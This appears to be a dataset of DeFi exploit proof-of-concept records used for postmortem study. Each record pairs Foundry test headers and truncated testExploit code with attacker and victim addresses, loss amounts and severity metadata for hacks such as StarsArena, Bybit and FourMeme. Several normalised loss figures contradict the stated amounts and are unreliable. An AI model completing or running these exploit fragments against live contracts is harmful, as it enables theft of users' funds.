// Attack Contract : https://snowtrace.io/address/0x7f283edc5ec7163de234e6a97f... | exploit_poc | StarsArena | 2023-10 | StarsArena_exp.sol | reentrancy | 1b97c50377124727 | 2026-01-07T10:59:16.543031 | postmortems | avalanche | 36,136,405 | ~3M$ | 3,000,000 | https://snowtrace.io/address/0xa2ebf3fcd757e9be1e58b643b6b5077d11b4ad7a | https://snowtrace.io/address/0x7f283edc5ec7163de234e6a97fdfb16ff2d2c7ac | null | https://snowtrace.io/tx/0x4f37ffecdad598f53b8d5a2d9df98e3c00fbda4328585eb9947a412b5fe17ac5 | null | null | true | true | true | critical | ~3M$ | reentrancy | function testExploit() public {
deal(address(this), 1 ether);
emit log_named_decimal_uint("Attacker AVAX balance before exploit", address(this).balance, 18);
(bool success,) = victimContract.call{value: 1 ether}(
abi.encodeWithSelector(bytes4(0xe9ccf3a3), address(this), true, addre... | true | ~3M$ | https://snowtrace.io/address/0xa2ebf3fcd757e9be1e58b643b6b5077d11b4ad7a | https://snowtrace.io/address/0x7f283edc5ec7163de234e6a97fdfb16ff2d2c7ac | https://snowtrace.io/tx/0x4f37ffecdad598f53b8d5a2d9df98e3c00fbda4328585eb9947a412b5fe17ac5 | $3.00M | 7 | medium | StarsArena Exploit (2023-10) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$8K
// Attacker : https://etherscan.io/address/0x9b99d7ce9e39c68ab93348fd31fd4c99f79e4b19
// Attack Contract : https://etherscan.io/address/0xa6d35c97bd00b99a962393408a... | exploit_poc | kTAF | 2023-10 | kTAF_exp.sol | flash_loan | 898bc133358c1a20 | 2026-01-07T10:59:16.543074 | postmortems | ethereum | 18,385,885 | ~$8K | 8,000 | https://etherscan.io/address/0x9b99d7ce9e39c68ab93348fd31fd4c99f79e4b19 | https://etherscan.io/address/0xa6d35c97bd00b99a962393408aaa9eb275a45c5e | null | https://etherscan.io/tx/0x325999373f1aae98db2d89662ff1afbe0c842736f7564d16a7b52bf5c777d3a4 | null | null | true | true | true | low | ~$8K | flash-loan | function testExploit() public {
emit log_named_decimal_uint("Attacker DAI balance before exploit", DAI.balanceOf(address(this)), DAI.decimals());
emit log_named_decimal_uint("Attacker TAF balance before exploit", TAF.balanceOf(address(this)), TAF.decimals());
address[] memory tokens = new addr... | true | ~$8K | https://etherscan.io/address/0x9b99d7ce9e39c68ab93348fd31fd4c99f79e4b19 | https://etherscan.io/address/0xa6d35c97bd00b99a962393408aaa9eb275a45c5e | https://etherscan.io/tx/0x325999373f1aae98db2d89662ff1afbe0c842736f7564d16a7b52bf5c777d3a4 | $8.0K | 8.97 | high | kTAF Exploit (2023-10) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~827 USDC
// Attacker : https://etherscan.io/address/0x7f284235aef122215c46656163f39212ffa77ed9
// Attack Contract :https://etherscan.io/address/0xba2aa7426ec6529c25a386... | exploit_poc | DePayRouter | 2023-10 | DePayRouter_exp.sol | null | f9844bf5a60e8740 | 2026-01-07T10:59:16.543142 | postmortems | ethereum | 18,281,130 | ~827 USDC | 827 | https://etherscan.io/address/0x7f284235aef122215c46656163f39212ffa77ed9 | https://etherscan.io/address/0xba2aa7426ec6529c25a38679478645b2db5fa19b | https://etherscan.io/address/0xae60ac8e69414c2dc362d0e6a03af643d1d85b92 | https://etherscan.io/tx/0x9a036058afb58169bfa91a826f5fcf4c0a376e650960669361d61bef99205f35 | null | https://twitter.com/CertiKAlert/status/1709764146324009268 | true | true | false | low | ~827 USDC | unknown | false | ~827 USDC | https://etherscan.io/address/0x7f284235aef122215c46656163f39212ffa77ed9 | https://etherscan.io/address/0xba2aa7426ec6529c25a38679478645b2db5fa19b | https://etherscan.io/address/0xae60ac8e69414c2dc362d0e6a03af643d1d85b92 | https://etherscan.io/tx/0x9a036058afb58169bfa91a826f5fcf4c0a376e650960669361d61bef99205f35 | https://twitter.com/CertiKAlert/status/1709764146324009268 | $827 | 6.66 | medium | DePayRouter Exploit (2023-10) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~228591 USD$
// Attacker : https://etherscan.io/address/0x792ec27874e1f614e757a1ae49d00ef5b2c73959
// Attack Contract : https://etherscan.io/address/0xb2e855411f67378c08... | exploit_poc | Astrid | 2023-10 | Astrid_exp.sol | null | 23b69fdbd6e6eb66 | 2026-01-07T10:59:16.543211 | postmortems | ethereum | 18,448,167 | ~228591 USD$ | 228,591 | https://etherscan.io/address/0x792ec27874e1f614e757a1ae49d00ef5b2c73959 | https://etherscan.io/address/0xb2e855411f67378c08f47401eacff37461e16188 | https://etherscan.io/address/0xbAa87546cF87b5De1b0b52353A86792D40b8BA70 | https://etherscan.io/tx/0x8af9b5fb3e2e3df8659ffb2e0f0c1f4c90d5a80f4f6fccef143b823ce673fb60 | null | null | true | true | false | high | ~228591 USD$ | unknown | function testExpolit() public {
address[] memory stakedTokens = new address[](3);
stakedTokens[0] = address(stETH);
stakedTokens[1] = address(rETH);
stakedTokens[2] = address(cbETH);
deal(address(this), 0);
uint256[] memory balances = new uint256[](3);
emit log_na... | true | ~228591 USD$ | https://etherscan.io/address/0x792ec27874e1f614e757a1ae49d00ef5b2c73959 | https://etherscan.io/address/0xb2e855411f67378c08f47401eacff37461e16188 | https://etherscan.io/address/0xbAa87546cF87b5De1b0b52353A86792D40b8BA70 | https://etherscan.io/tx/0x8af9b5fb3e2e3df8659ffb2e0f0c1f4c90d5a80f4f6fccef143b823ce673fb60 | $228.6K | 8.89 | high | Astrid Exploit (2023-10) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~83,994 USD$
// Attacker : https://etherscan.io/address/0x413e4fb75c300b92fec12d7c44e4c0b4faab4d04
// Attack Contract : https://etherscan.io/address/0x2b326a17b5ef826fa... | exploit_poc | UniBot | 2023-10 | UniBot_exp.sol | null | 102f808e67724a52 | 2026-01-07T10:59:16.543274 | postmortems | ethereum | 18,467,805 | ~83,994 USD$ | 83 | https://etherscan.io/address/0x413e4fb75c300b92fec12d7c44e4c0b4faab4d04 | https://etherscan.io/address/0x2b326a17b5ef826fa4e17d3836364ae1f0231a6f | null | null | null | null | true | true | false | low | ~83,994 USD$ | unknown | function testExploit() public {
emit log_named_decimal_uint(
"Attacker UniBot balance before exploit", UniBot.balanceOf(address(this)), UniBot.decimals()
);
address[] memory victims = new address[](17);
victims[0] = 0xA20Cb17D888b7E426A3a7Ca2E583706dE48a04f3;
victim... | true | https://etherscan.io/address/0x413e4fb75c300b92fec12d7c44e4c0b4faab4d04 | https://etherscan.io/address/0x2b326a17b5ef826fa4e17d3836364ae1f0231a6f | $83 | 5.88 | medium | UniBot Exploit (2023-10) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~104M
// Attacker : https://etherscan.io/address/0x4B53608fF0cE42cDF9Cf01D7d024C2c9ea1aA2e8
// Attack Contract : https://etherscan.io/address/0xF51E888616a123875EAf7AFd441... | exploit_poc | HegicOptions | 2025-02 | HegicOptions_exp.sol | null | 1e0bf2f3d47c72d6 | 2026-01-07T10:59:16.543328 | postmortems | ethereum | null | ~104M | 104,000,000 | https://etherscan.io/address/0x4B53608fF0cE42cDF9Cf01D7d024C2c9ea1aA2e8 | https://etherscan.io/address/0xF51E888616a123875EAf7AFd4417fbc4111750f7 | https://etherscan.io/address/0x7094E706E75E13D1E0ea237f71A7C4511e9d270B | null | null | null | true | true | false | critical | ~104M | unknown | function testExploit() public {
// The attacker initially deposited 0.0025 WBTC into the victim contract.
// Tx: 0x9c27d45c1daa943ce0b92a70ba5efa6ab34409b14b568146d2853c1ddaf14f82
vm.startPrank(attacker_address, attacker_address);
// Attack Tx 1
vm.createSelectFork("ma... | true | ~104M | https://etherscan.io/address/0x4B53608fF0cE42cDF9Cf01D7d024C2c9ea1aA2e8 | https://etherscan.io/address/0xF51E888616a123875EAf7AFd4417fbc4111750f7 | https://etherscan.io/address/0x7094E706E75E13D1E0ea237f71A7C4511e9d270B | $104.00M | 6.44 | medium | HegicOptions Exploit (2025-02) | true | true | false | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ $3,500
// Attacker : https://etherscan.io/address/0xedee6379fe90bd9b85d8d0b767d4a6deb0dc9dcf
// Attack Tx : https://etherscan.io/tx/0x2c1a19982aa88bee8a5d9a5dfeb406f2bfe... | exploit_poc | PeapodsFinance | 2025-02 | PeapodsFinance_exp.sol | null | 0f12aca1870c3966 | 2026-01-07T10:59:16.543379 | postmortems | ethereum | 21,800,591 | ~ $3,500 | 3 | https://etherscan.io/address/0xedee6379fe90bd9b85d8d0b767d4a6deb0dc9dcf | null | null | https://etherscan.io/tx/0x2c1a19982aa88bee8a5d9a5dfeb406f2bfe1cfc1213f20e91d91ce3b55c86cc5 | https://blog.solidityscan.com/peapods-finance-hack-analysis-bdc5432107a5 | null | true | true | false | low | ~ $3,500 | unknown | function testExploit() public {
emit log_named_decimal_uint("Before balance of pOHM", IERC20(pOHM).balanceOf(attacker), 18);
vm.startPrank(attacker);
AttackerC attC = new AttackerC(attacker);
attC.attack();
vm.stopPrank();
emit log_named_decimal_uint("After balance of p... | true | ~ $3,500 | https://etherscan.io/address/0xedee6379fe90bd9b85d8d0b767d4a6deb0dc9dcf | https://etherscan.io/tx/0x2c1a19982aa88bee8a5d9a5dfeb406f2bfe1cfc1213f20e91d91ce3b55c86cc5 | https://blog.solidityscan.com/peapods-finance-hack-analysis-bdc5432107a5 | $3 | 6.84 | medium | PeapodsFinance Exploit (2025-02) | true | false | true | true | |||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 6700 USD
// Attacker : https://bscscan.com/address/0xd75652ada2f6a140f2ffcd7cd20f34c21fbc3fbc
// Attack Contract : https://bscscan.com/address/0x0a2f4da966319c14ee4c9f1a2bf04fe738df3ce5
// Vulnerable Contract :... | exploit_poc | unverified_35bc | 2025-02 | unverified_35bc_exp.sol | null | 6c6931a2f37df821 | 2026-01-07T10:59:16.543434 | postmortems | bsc | 46,886,078 | 6700 USD | 6,700 | https://bscscan.com/address/0xd75652ada2f6a140f2ffcd7cd20f34c21fbc3fbc | https://bscscan.com/address/0x0a2f4da966319c14ee4c9f1a2bf04fe738df3ce5 | https://bscscan.com/address/0xde91e6e937ec344e5a3c800539c41979c2d85278 | https://app.blocksec.com/explorer/tx/bsc/0xd7a61b07ca4dc5966d00b3cc99b03c6ab2cee688fa13b30bea08f5142023777d | https://x.com/TenArmorAlert/status/1893333680417890648 | https://x.com/TenArmorAlert/status/1893333680417890648 | true | true | false | low | 6700 USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC{value: 0.6 ether}();
vm.stopPrank();
emit log_named_decimal_uint("after attack: balance ... | true | 6700 USD | https://bscscan.com/address/0xd75652ada2f6a140f2ffcd7cd20f34c21fbc3fbc | https://bscscan.com/address/0x0a2f4da966319c14ee4c9f1a2bf04fe738df3ce5 | https://bscscan.com/address/0xde91e6e937ec344e5a3c800539c41979c2d85278 | https://app.blocksec.com/explorer/tx/bsc/0xd7a61b07ca4dc5966d00b3cc99b03c6ab2cee688fa13b30bea08f5142023777d | https://x.com/TenArmorAlert/status/1893333680417890648 | https://x.com/TenArmorAlert/status/1893333680417890648 | $6.7K | 7.68 | medium | unverified_35bc Exploit (2025-02) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import {IERC20} from "../interface.sol";
// @KeyInfo - Total Lost : 1.5B (401346 ETH + 8000 mETH + 15000 cmETH + 90375 stETH)
// Attacker : https://etherscan.io/address/0x0fa09c3a328792253f8dee7116848723b72a6d2e
// Attack Contra... | exploit_poc | Bybit | 2025-02 | Bybit_exp.sol | null | 24df6430a21cd79f | 2026-01-07T10:59:16.543517 | postmortems | ethereum | null | 1.5B (401346 ETH + 8000 mETH + 15000 cmETH + 90375 stETH) | 1,500,000,000 | https://etherscan.io/address/0x0fa09c3a328792253f8dee7116848723b72a6d2e | null | null | null | https://x.com/zachxbt/status/1893211577836302365 | https://x.com/SlowMist_Team/status/1892963250385592345 | true | true | false | critical | 1.5B (401346 ETH + 8000 mETH + 15000 cmETH + 90375 stETH) | unknown | function testExploit() public {
console.log("Real exploit start......");
// Print slot 0 of bybit cold wallet 1
// slot 0 stores masterCopy(address)
console.log(
"Before attack, Bybit cold wallet 1 masterCopy:",
address(uint160(uint256(vm.load(bybitColdWallet1, by... | true | 1.5B (401346 ETH + 8000 mETH + 15000 cmETH + 90375 stETH) | https://etherscan.io/address/0x0fa09c3a328792253f8dee7116848723b72a6d2e | https://x.com/zachxbt/status/1893211577836302365 | https://x.com/SlowMist_Team/status/1892963250385592345 | $1500.00M | 7 | medium | Bybit Exploit (2025-02) | true | false | false | true | |||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 15.2k USD
// Attacker : 0x8149f77504007450711023cf0ec11bdd6348401f
// Attack Contract : https://bscscan.com/address/0x009e64c02848dc51aa3f46775c2cfbf1190c2841
// Vulnerable Contract : https://bscscan.com/addres... | exploit_poc | unverified_d4f1 | 2025-02 | unverified_d4f1_exp.sol | null | 51cd287dc2b65d1c | 2026-01-07T10:59:16.543604 | postmortems | bsc | 46,681,362 | 15.2k USD | 15,200 | null | https://bscscan.com/address/0x009e64c02848dc51aa3f46775c2cfbf1190c2841 | https://bscscan.com/address/0xd4f1afd0331255e848c119ca39143d41144f7cb3 | https://app.blocksec.com/explorer/tx/bsc/0xc7fc7e066ec2d4ea659061b75308c9016c0efab329d1055c2a8d91cc11dc3868 | https://x.com/TenArmorAlert/status/1890776122918309932 | https://x.com/TenArmorAlert/status/1890776122918309932 | true | true | false | medium | 15.2k USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
deal(address(attC), 23.007026290916617 ether);
vm.stopPrank();
emit log_named... | true | 15.2k USD | https://bscscan.com/address/0x009e64c02848dc51aa3f46775c2cfbf1190c2841 | https://bscscan.com/address/0xd4f1afd0331255e848c119ca39143d41144f7cb3 | https://app.blocksec.com/explorer/tx/bsc/0xc7fc7e066ec2d4ea659061b75308c9016c0efab329d1055c2a8d91cc11dc3868 | https://x.com/TenArmorAlert/status/1890776122918309932 | https://x.com/TenArmorAlert/status/1890776122918309932 | $15.2K | 7.11 | medium | unverified_d4f1 Exploit (2025-02) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 137.9 BNB
// Original Attacker : https://bscscan.com/address/0xFb1cc1548D039f14b02cfF9aE86757Edd2CDB8A5
// Attack Contract(Init) : https://bscscan.com/address/0xd4c80700ca... | exploit_poc | StepHeroNFTs | 2025-02 | StepHeroNFTs_exp.sol | null | 31612644bcaa6262 | 2026-01-07T10:59:16.543653 | postmortems | bsc | 46,843,424 | 137.9 BNB | 137,900,000,000 | https://bscscan.com/address/0xFb1cc1548D039f14b02cfF9aE86757Edd2CDB8A5 | null | https://bscscan.com/address/0x9823E10A0bF6F64F59964bE1A7f83090bf5728aB | https://bscscan.com/tx/0xef386a69ca6a147c374258a1bf40221b0b6bd9bc449a7016dbe5240644581877 | null | null | true | false | false | critical | 137.9 BNB | unknown | function testPoC() public {
vm.startPrank(attacker);
new AttackerC(attacker);
emit log_named_decimal_uint("Profit in BNB", attacker.balance, 18);
}
}
contract AttackerC {
constructor (address to) {
AttackerC1 attC1 = new AttackerC1();
attC1.attack(to);
}
}... | true | 137.9 BNB | https://bscscan.com/address/0xFb1cc1548D039f14b02cfF9aE86757Edd2CDB8A5 | https://bscscan.com/address/0x9823E10A0bF6F64F59964bE1A7f83090bf5728aB | https://bscscan.com/tx/0xef386a69ca6a147c374258a1bf40221b0b6bd9bc449a7016dbe5240644581877 | $137900.00M | 7.72 | medium | StepHeroNFTs Exploit (2025-02) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import {IERC20, WETH} from "../interface.sol";
// @KeyInfo - Total Lost : 186k (287bnb)
// Attacker 1: https://bscscan.com/address/0x010Fc97CB0a4D101dCe20DAB37361514bD59A53A
// Attacker 2: https://bscscan.com/address/0x935d6cf07... | exploit_poc | FourMeme | 2025-02 | FourMeme_exp.sol | null | 69868c933b56d717 | 2026-01-07T10:59:16.543729 | postmortems | bsc | null | 186k (287bnb) | 186,000 | null | null | null | null | https://securrtech.medium.com/the-four-meme-exploit-a-deep-dive-into-the-183-000-hack-6f45369029be | https://x.com/four_meme_/status/1889198796695044138 | true | true | false | high | 186k (287bnb) | unknown | function testExploit() public balanceLog {
// Preparation
buyMemeToken(); // User can only get meme token from four.meme platform during this stage
HackerCreatePool(); // Hacker create a pool with extremely high sqrtPriceX96
CreatePool(); // When the market capitalization of the memecoin... | true | 186k (287bnb) | https://securrtech.medium.com/the-four-meme-exploit-a-deep-dive-into-the-183-000-hack-6f45369029be | https://x.com/four_meme_/status/1889198796695044138 | $186.0K | 7 | medium | FourMeme Exploit (2025-02) | true | false | false | true | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
// PoC is incomplete, not sure why but Hardhat and JS gave me a severe headache ¯\_(ツ)_/¯
/*
Attack tx: https://etherscan.io/tx/0x0af5a6d2d8b49f68dcfd4599a0e767450e76e08a5aeba9b3d534a604d308e60b
Post Mortems:
https://cmichel... | exploit_poc | Sushi_Badger_Digg | 2021-01 | Sushi_Badger_Digg_exp.sol | null | bda5eadecd9b7893 | 2026-01-07T10:59:16.543851 | postmortems | ethereum | 11,720,049 | null | null | null | null | null | https://etherscan.io/tx/0x0af5a6d2d8b49f68dcfd4599a0e767450e76e08a5aeba9b3d534a604d308e60b | null | null | false | false | false | medium | null | unknown | false | Unknown | 4 | low | Sushi_Badger_Digg Exploit (2021-01) | false | false | true | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// reason : Use pair balance to calculate the reward,and not update the time correctly,so can claim reward more times.
// guy : https://x.com/TenArmorAlert/status/1877030261067571234
// tx : ... | exploit_poc | LPMine | 2025-01 | LPMine_exp.sol | flash_loan | 6f19b1e490b8bc05 | 2026-01-07T10:59:16.543925 | postmortems | unknown | 45,583,892 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | false | Unknown | 3.26 | low | LPMine Exploit (2025-01) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 65K US$
// Attacker : 0x56f77AdC522BFfebB3AF0669564122933AB5EA4f
// Attack Contract : 0xaaE196b6E3f3Ee34405e857e7bfb05D74c5cf775
// Vulnerable Contract : 0xc10E0319337c... | exploit_poc | Ast | 2025-01 | Ast_exp.sol | null | c82af717a22ec743 | 2026-01-07T10:59:16.544011 | postmortems | bsc | 45,964,639 | 65K US$ | 65,000 | null | null | null | https://bscscan.com/tx/0x80dd9362d211722b578af72d551f0a68e0dc1b1e077805353970b2f65e793927 | null | null | true | true | false | medium | 65K US$ | unknown | function testExploit() public {
emit log_named_decimal_uint("[Start] Attacker BUSD balance before flash", IERC20(busd).balanceOf(address(this)), 18);
address recipient = address(this);
uint256 amount1 = 0;
bytes memory data = abi.encode(busd_amount);
// 调用闪电贷,贷款3000万个BUSD
... | true | 65K US$ | https://bscscan.com/tx/0x80dd9362d211722b578af72d551f0a68e0dc1b1e077805353970b2f65e793927 | $65.0K | 7.52 | medium | Ast Exploit (2025-01) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// Happy New Year
// @KeyInfo - Total Lost : 12.340357077284305206 ETH (~$41.2K USD)
// Attacker : https://etherscan.io/address/0x25869347f7993c50410a9b9b9c48f37d79e12a36
// Attack Contract 0 : http... | exploit_poc | LAURAToken | 2025-01 | LAURAToken_exp.sol | flash_loan | 429e0ac30146375b | 2026-01-07T10:59:16.544074 | postmortems | ethereum | 21,529,888 | 12.340357077284305206 ETH (~$41.2K USD) | 12.340357 | https://etherscan.io/address/0x25869347f7993c50410a9b9b9c48f37d79e12a36 | null | https://etherscan.io/token/0x05641e33fd15baf819729df55500b07b82eb8e89 | https://etherscan.io/tx/0xef34f4fdf03e403e3c94e96539354fb4fe0b79a5ec927eacc63bc04108dbf420 | null | null | true | false | true | low | 12.340357077284305206 ETH (~$41.2K USD) | flash-loan | function testPoC() public {
vm.startPrank(attacker);
AttackerC0 attC0 = new AttackerC0();
console.log("Final balance in ETH :", address(attC0).balance);
}
}
contract AttackerC0 {
constructor () {
AttackerC1 attC1 = new AttackerC1(); // L01
attC1.attack();// L04
}
... | true | 12.340357077284305206 ETH (~$41.2K USD) | https://etherscan.io/address/0x25869347f7993c50410a9b9b9c48f37d79e12a36 | https://etherscan.io/token/0x05641e33fd15baf819729df55500b07b82eb8e89 | https://etherscan.io/tx/0xef34f4fdf03e403e3c94e96539354fb4fe0b79a5ec927eacc63bc04108dbf420 | $12 | 10 | high | LAURAToken Exploit (2025-01) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : 19K
// Attacker : https://bscscan.com/address/0xb7d7240c207e094a9be802c0f370528a9c39fed5
// Attack Contract : https://bscscan.com/address/0x851288dcfb39330291015c82a5a93721cc92507a
// Vulnerable Contra... | exploit_poc | Mosca | 2025-01 | Mosca_exp.sol | null | 9cd71db65e02d1b1 | 2026-01-07T10:59:16.544137 | postmortems | bsc | null | 19K | 19,000 | https://bscscan.com/address/0xb7d7240c207e094a9be802c0f370528a9c39fed5 | https://bscscan.com/address/0x851288dcfb39330291015c82a5a93721cc92507a | https://bscscan.com/address/0x1962b3356122d6a56f978e112d14f5e23a25037d | https://bscscan.com/tx/0x4e5bb7e3f552f5ee6ee97db9a9fcf07287aae9a1974e24999690855741121aff | null | null | true | true | false | medium | 19K | unknown | function testExploit() public balanceLog {
IERC20(USDC).approve(MOSCA, type(uint256).max);
uint256 amount = 30_000_000_000_000_000_000;
uint256 refCode = 0;
uint8 fiat = 2;
bool enterpriseJoin = false;
IMosca(MOSCA).join(amount, refCode, fiat, enterpriseJoin);
a... | true | 19K | https://bscscan.com/address/0xb7d7240c207e094a9be802c0f370528a9c39fed5 | https://bscscan.com/address/0x851288dcfb39330291015c82a5a93721cc92507a | https://bscscan.com/address/0x1962b3356122d6a56f978e112d14f5e23a25037d | https://bscscan.com/tx/0x4e5bb7e3f552f5ee6ee97db9a9fcf07287aae9a1974e24999690855741121aff | $19.0K | 7.3 | medium | Mosca Exploit (2025-01) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : 21.5K
// Attacker : https://bscscan.com/address/0xf1e73123594cb0f3655d40e4dd6bde41fa8806e8
// Attack Contract : https://bscscan.com/address/0xe40ab156440804c3404bb80cbb6b47dddd3abfd7
// Vulnerable Cont... | exploit_poc | JPulsepot | 2025-01 | JPulsepot_exp.sol | null | 673f41073d5ae68f | 2026-01-07T10:59:16.544188 | postmortems | bsc | null | 21.5K | 21,500 | https://bscscan.com/address/0xf1e73123594cb0f3655d40e4dd6bde41fa8806e8 | https://bscscan.com/address/0xe40ab156440804c3404bb80cbb6b47dddd3abfd7 | https://bscscan.com/address/0x384b9fb6e42dab87f3023d87ea1575499a69998e | https://bscscan.com/tx/0xd6ba15ecf3df9aaae37450df8f79233267af41535793ee1f69c565b50e28f7da | null | https://x.com/CertiKAlert/status/1877662352834793639 | true | true | false | medium | 21.5K | unknown | function testExploit() public balanceLog {
//implement exploit code here
address recipient = address(this);
uint256 amount0 = 0;
uint256 amount1 = 4_300_000_000_000_000_000_000;
bytes memory data = abi.encode(amount1);
IPancakeV3Pool(PancakeV3Pool).flash(recipient, amount... | true | 21.5K | https://bscscan.com/address/0xf1e73123594cb0f3655d40e4dd6bde41fa8806e8 | https://bscscan.com/address/0xe40ab156440804c3404bb80cbb6b47dddd3abfd7 | https://bscscan.com/address/0x384b9fb6e42dab87f3023d87ea1575499a69998e | https://bscscan.com/tx/0xd6ba15ecf3df9aaae37450df8f79233267af41535793ee1f69c565b50e28f7da | https://x.com/CertiKAlert/status/1877662352834793639 | $21.5K | 7.55 | medium | JPulsepot Exploit (2025-01) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : ~28K
// Attacker : https://bscscan.com/address/0x0000000000004f3d8aaf9175fd824cb00ad4bf80
// Attack Contract : https://bscscan.com/address/0x000000000000bb1b11e5ac8099e92e366b64c133
// Vulnerable Contr... | exploit_poc | RoulettePotV2 | 2025-01 | RoulettePotV2_exp.sol | null | 27848b9080f7f00f | 2026-01-07T10:59:16.544236 | postmortems | bsc | null | ~28K | 28,000 | https://bscscan.com/address/0x0000000000004f3d8aaf9175fd824cb00ad4bf80 | https://bscscan.com/address/0x000000000000bb1b11e5ac8099e92e366b64c133 | https://bscscan.com/address/0xf573748637e0576387289f1914627d716927f90f | https://bscscan.com/tx/0xd9e0014a32d96cfc8b72864988a6e1664a9b6a2e90aeaa895fcd42da11cc3490 | null | https://x.com/TenArmorAlert/status/1878008055717376068 | true | true | false | medium | ~28K | unknown | function testExploit() public balanceLog {
address recipient = PancakeSwap;
uint256 amount0 = 0;
uint256 amount1 = 4_203_732_130_200_000_000_000;
bytes memory data = abi.encode(amount1);
IPancakeV3Pool(PancakeV3Pool).flash(recipient, amount0, amount1, data);
} | true | ~28K | https://bscscan.com/address/0x0000000000004f3d8aaf9175fd824cb00ad4bf80 | https://bscscan.com/address/0x000000000000bb1b11e5ac8099e92e366b64c133 | https://bscscan.com/address/0xf573748637e0576387289f1914627d716927f90f | https://bscscan.com/tx/0xd9e0014a32d96cfc8b72864988a6e1664a9b6a2e90aeaa895fcd42da11cc3490 | https://x.com/TenArmorAlert/status/1878008055717376068 | $28.0K | 7.41 | medium | RoulettePotV2 Exploit (2025-01) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 97 stETH
// Attacker : https://etherscan.io/address/0xe546480138d50bb841b204691c39cc514858d101
// Attack Contract : https://etherscan.io/address/0x22d22134612c0741ebdb3b74a58... | exploit_poc | IdolsNFT | 2025-01 | IdolsNFT_exp.sol | null | 52467dbf83596a5b | 2026-01-07T10:59:16.544285 | postmortems | ethereum | null | 97 stETH | 97 | https://etherscan.io/address/0xe546480138d50bb841b204691c39cc514858d101 | https://etherscan.io/address/0x22d22134612c0741ebdb3b74a58842d6e74e3b16 | https://etherscan.io/address/0x439cac149b935ae1d726569800972e1669d17094 | https://etherscan.io/tx/0x5e989304b1fb61ea0652db4d0f9476b8882f27191c1f1d2841f8977cb8c5284c | https://rekt.news/theidolsnft-rekt | https://x.com/TenArmorAlert/status/1879376744161132981 | true | true | false | low | 97 stETH | unknown | function testExploit() public balanceLog {
address contractAddress = vm.computeCreateAddress(address(this), vm.getNonce(address(this)));
vm.prank(ATTACKER);
IIDOLS(IDOLS_NFT).safeTransferFrom(ATTACKER, contractAddress, TOKEN_ID);
new AttackContract();
// This process repeated ... | true | 97 stETH | https://etherscan.io/address/0xe546480138d50bb841b204691c39cc514858d101 | https://etherscan.io/address/0x22d22134612c0741ebdb3b74a58842d6e74e3b16 | https://etherscan.io/address/0x439cac149b935ae1d726569800972e1669d17094 | https://etherscan.io/tx/0x5e989304b1fb61ea0652db4d0f9476b8882f27191c1f1d2841f8977cb8c5284c | https://rekt.news/theidolsnft-rekt | https://x.com/TenArmorAlert/status/1879376744161132981 | $97 | 7.68 | medium | IdolsNFT Exploit (2025-01) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : 37.6K
// Attacker : https://bscscan.com/address/0xe763da20e25103da8e6afa84b6297f87de557419
// Attack Contract : https://bscscan.com/address/0xedcfa34e275120e7d18edbbb0a6171d8ad3ccf54
